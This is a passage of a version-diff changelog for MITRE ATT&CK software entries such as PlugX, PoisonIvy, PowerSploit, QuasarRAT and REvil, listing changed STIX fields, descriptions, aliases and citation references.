| external_references[3]['url'] | https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ | https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf |
| external_references[4]['source_name'] | ClearSky MuddyWater Nov 2018 | Unit 42 MuddyWater Nov 2017 |
| external_references[4]['description'] | ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018. | Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018. |
| external_references[4]['url'] | https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf | https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/ |
| x_mitre_version | 2.1 | 2.2 |
| Description |
|---|
| [PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 12:58:20.120000+00:00 | 2022-10-05 16:04:51.193000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | PS1 |
| Description |
|---|
| [Penquin](https://attack.mitre.org/software/S0587) is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-09 17:35:29.546000+00:00 | 2022-10-20 04:12:29.037000+00:00 |
| external_references[4]['url'] | https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf | https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-06 17:25:07.301000+00:00 | 2022-07-29 19:50:27.063000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Linux', 'Windows', 'macOS'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-13 18:56:52.195000+00:00 |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | ping.exe |
| Old Description | New Description |
|---|---|
| [PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390) | [PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | http://labs.lastline.com/an-analysis-of-plugx | |
| external_references | https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 21:43:42.587000+00:00 | 2022-04-15 16:30:28.192000+00:00 |
| description | [PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390) | [PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.(Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: New DragonOK)(Citation: Dell TG-3390) |
| external_references[1]['source_name'] | PlugX | DestroyRAT |
| external_references[1]['description'] | (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013) | (Citation: CIRCL PlugX March 2013) |
| external_references[2]['source_name'] | DestroyRAT | Kaba |
| external_references[2]['description'] | (Citation: CIRCL PlugX March 2013) | (Citation: FireEye Clandestine Fox Part 2) |
| external_references[3]['source_name'] | Sogu | PlugX |
| external_references[4]['source_name'] | Kaba | Korplug |
| external_references[4]['description'] | (Citation: FireEye Clandestine Fox Part 2) | (Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013) |
| external_references[5]['source_name'] | Korplug | Sogu |
| external_references[5]['description'] | (Citation: Lastline PlugX Analysis)(Citation: CIRCL PlugX March 2013) | (Citation: Lastline PlugX Analysis)(Citation: FireEye Clandestine Fox Part 2)(Citation: CIRCL PlugX March 2013) |
| external_references[6]['source_name'] | Lastline PlugX Analysis | Thoper |
| external_references[6]['description'] | Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015. | (Citation: Novetta-Axiom) |
| external_references[7]['source_name'] | FireEye Clandestine Fox Part 2 | TVT |
| external_references[7]['description'] | Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016. | (Citation: Novetta-Axiom) |
| external_references[8]['source_name'] | New DragonOK | CIRCL PlugX March 2013 |
| external_references[8]['description'] | Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015. | Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018. |
| external_references[8]['url'] | http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ | http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf |
| external_references[10]['source_name'] | CIRCL PlugX March 2013 | New DragonOK |
| external_references[10]['description'] | Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018. | Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015. |
| external_references[10]['url'] | http://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf | http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ |
| x_mitre_version | 2.1 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Novetta-Axiom', 'description': 'Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.', 'url': 'http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf'} | |
| external_references | {'source_name': 'FireEye Clandestine Fox Part 2', 'description': 'Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.', 'url': 'https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html'} | |
| external_references | {'source_name': 'Lastline PlugX Analysis', 'description': 'Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.', 'url': 'http://labs.lastline.com/an-analysis-of-plugx'} | |
| x_mitre_aliases | Thoper | |
| x_mitre_aliases | TVT |
| Description |
|---|
| [PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-24 21:20:30.634000+00:00 | 2022-04-19 01:41:29.396000+00:00 |
| external_references[1]['source_name'] | Talos PoetRAT April 2020 | Dragos Threat Report 2020 |
| external_references[1]['description'] | Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020. | Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021. |
| external_references[1]['url'] | https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html | https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770 |
| external_references[2]['source_name'] | Talos PoetRAT October 2020 | Talos PoetRAT April 2020 |
| external_references[2]['description'] | Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021. | Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020. |
| external_references[2]['url'] | https://blog.talosintelligence.com/2020/10/poetrat-update.html | https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html |
| external_references[3]['source_name'] | Dragos Threat Report 2020 | Talos PoetRAT October 2020 |
| external_references[3]['description'] | Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021. | Mercer, W. Rascagneres, P. Ventura, V. (2020, October 6). PoetRAT: Malware targeting public and private sector in Azerbaijan evolves . Retrieved April 9, 2021. |
| external_references[3]['url'] | https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770 | https://blog.talosintelligence.com/2020/10/poetrat-update.html |
| x_mitre_version | 2.0 | 2.1 |
| Old Description | New Description |
|---|---|
| [PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005) | [PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:58:17.100000+00:00 | 2022-09-30 21:02:39.862000+00:00 |
| description | [PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005) | [PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups.(Citation: FireEye Poison Ivy)(Citation: Symantec Elderwood Sept 2012)(Citation: Symantec Darkmoon Aug 2005) |
| external_references[1]['source_name'] | PoisonIvy | Poison Ivy |
| external_references[2]['source_name'] | Poison Ivy | PoisonIvy |
| external_references[2]['description'] | (Citation: FireEye Poison Ivy) (Citation: Symantec Darkmoon Sept 2014) | (Citation: FireEye Poison Ivy)(Citation: Symantec Darkmoon Sept 2014) |
| external_references[3]['source_name'] | Darkmoon | Breut |
| external_references[3]['description'] | (Citation: Symantec Darkmoon Sept 2014) | (Citation: Novetta-Axiom) |
| external_references[4]['source_name'] | FireEye Poison Ivy | Darkmoon |
| external_references[4]['description'] | FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014. | (Citation: Symantec Darkmoon Sept 2014) |
| external_references[5]['source_name'] | Symantec Elderwood Sept 2012 | FireEye Poison Ivy |
| external_references[5]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014. |
| external_references[5]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf |
| external_references[7]['source_name'] | Symantec Darkmoon Sept 2014 | Novetta-Axiom |
| external_references[7]['description'] | Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018. | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. |
| external_references[7]['url'] | https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf |
| x_mitre_version | 1.3 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Symantec Elderwood Sept 2012', 'description': "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", 'url': 'https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf'} | |
| external_references | {'source_name': 'Symantec Darkmoon Sept 2014', 'description': 'Payet, L. (2014, September 19). Life on Mars: How attackers took advantage of hope for alien existance in new Darkmoon campaign. Retrieved September 13, 2018.', 'url': 'https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign'} | |
| x_mitre_aliases | Breut |
| Description |
|---|
| [PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 13:59:23.129000+00:00 | 2022-06-03 17:45:36.186000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-05 01:24:41.497000+00:00 | 2022-09-27 18:18:15.392000+00:00 |
| external_references[1]['source_name'] | GitHub PowerSploit May 2012 | PowerShellMagazine PowerSploit July 2014 |
| external_references[1]['description'] | PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018. | Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018. |
| external_references[1]['url'] | https://github.com/PowerShellMafia/PowerSploit | http://www.powershellmagazine.com/2014/07/08/powersploit/ |
| external_references[2]['source_name'] | PowerShellMagazine PowerSploit July 2014 | GitHub PowerSploit May 2012 |
| external_references[2]['description'] | Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018. | PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018. |
| external_references[2]['url'] | http://www.powershellmagazine.com/2014/07/08/powersploit/ | https://github.com/PowerShellMafia/PowerSploit |
| x_mitre_version | 1.4 | 1.5 |
| Description |
|---|
| [Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 02:39:23.582000+00:00 | 2022-04-19 01:42:59.312000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| [PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec) | [PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 3.0.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-24 13:47:24.660000+00:00 | 2022-11-01 18:29:13.666000+00:00 |
| description | [PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec) | [PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers.(Citation: Russinovich Sysinternals)(Citation: SANS PsExec) |
| external_references[1]['source_name'] | Russinovich Sysinternals | SANS PsExec |
| external_references[1]['description'] | Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015. | Pilkington, M. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx | https://www.sans.org/blog/protecting-privileged-domain-accounts-psexec-deep-dive/ |
| external_references[2]['source_name'] | SANS PsExec | Russinovich Sysinternals |
| external_references[2]['description'] | Pilkington, M.. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016. | Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015. |
| external_references[2]['url'] | https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive | https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| [Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-22 17:54:15.287000+00:00 | 2022-08-23 15:25:11.145000+00:00 |
| external_references[1]['source_name'] | Palo Alto Gamaredon Feb 2017 | Pterodo |
| external_references[1]['description'] | Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017. | (Citation: Symantec Shuckworm January 2022)(Citation: Secureworks IRON TILDEN Profile) |
| x_mitre_version | 1.1 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Palo Alto Gamaredon Feb 2017', 'description': 'Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.', 'url': 'https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/'} | |
| external_references | {'source_name': 'Secureworks IRON TILDEN Profile', 'description': 'Secureworks CTU. (n.d.). IRON TILDEN. Retrieved February 24, 2022.', 'url': 'https://www.secureworks.com/research/threat-profiles/iron-tilden'} | |
| external_references | {'source_name': 'Symantec Shuckworm January 2022', 'description': 'Symantec. (2022, January 31). Shuckworm Continues Cyber-Espionage Attacks Against Ukraine. Retrieved February 17, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine'} | |
| x_mitre_aliases | Pterodo |
| Old Description | New Description |
|---|---|
| [QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018) | [QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Kyaw Pyiyt Htet, @KyawPyiytHtet'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-22 13:57:03.434000+00:00 | 2022-08-02 15:36:30.238000+00:00 |
| description | [QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018) | [QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018) |
| external_references[3]['source_name'] | GitHub QuasarRAT | Securelist APT10 March 2021 |
| external_references[3]['description'] | MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018. | GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021. |
| external_references[3]['url'] | https://github.com/quasar/QuasarRAT | https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/ |
| external_references[4]['source_name'] | Volexity Patchwork June 2018 | TrendMicro Patchwork Dec 2017 |
| external_references[4]['description'] | Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. | Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. |
| external_references[4]['url'] | https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ | https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf |
| external_references[5]['source_name'] | TrendMicro Patchwork Dec 2017 | GitHub QuasarRAT |
| external_references[5]['description'] | Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018. | MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018. |
| external_references[5]['url'] | https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf | https://github.com/quasar/QuasarRAT |
| external_references[6]['source_name'] | Securelist APT10 March 2021 | Volexity Patchwork June 2018 |
| external_references[6]['description'] | GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021. | Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018. |
| external_references[6]['url'] | https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/ | https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ |
| x_mitre_version | 1.2 | 2.0 |
| Old Description | New Description |
|---|---|
| [REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020) | [REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which has been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-18 19:38:51.122000+00:00 | 2022-05-24 21:09:01.019000+00:00 |
| description | [REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020) | [REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which has been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020) |
| external_references[3]['source_name'] | Secureworks REvil September 2019 | Talos Sodinokibi April 2019 |
| external_references[3]['description'] | Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020. | Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020. |
